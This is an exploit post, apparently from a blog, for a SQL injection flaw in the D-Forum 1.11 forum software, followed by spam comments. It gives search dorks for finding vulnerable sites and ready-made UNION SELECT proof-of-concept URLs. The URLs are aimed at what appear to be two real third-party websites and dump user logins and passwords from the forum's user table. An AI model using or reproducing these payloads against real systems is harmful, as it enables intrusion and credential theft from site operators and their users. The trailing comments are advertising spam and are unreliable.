D-Forum 1.11 SQL Injection Vulnerability

[o] D-Forum 1.11 SQL Injection Vulnerability

Software : D-Forum version 1.11 [previous version affected too]
Vendor : http://www.adalis.fr/dforum
Author : NoGe


[o] Exploit

http://localhost/[path]/nav.php3?page=voirsujet&boardid=1&postid=[SQLi]


[o] Dork

"Powered by D-forum"
"nav.php3?page=voirsujet"


[o] PoC

http://www.enesm.com/forum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--
http://bmxverrieres.free.fr/dforum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--

4 Responses so far.

  1. Thanks for one’s marvelous posting! I definitely enjoyed reading it, you can be a great author. I will be sure to bookmark your blog.
    online uk

  2. Thanks for the FANTASTIC post! This information is really good and thanks a ton for sharing it. I m looking forward desperately for the next post of yours.
    custom research

  3. akkonm says:
    This comment has been removed by the author.
  4. akkonm says:

    Some one hacked my Powered by D-forum in few days but thanks to www.rushessay.org/buy-essay for their supportive topic of hacking which helped me to reveal my website from hacker.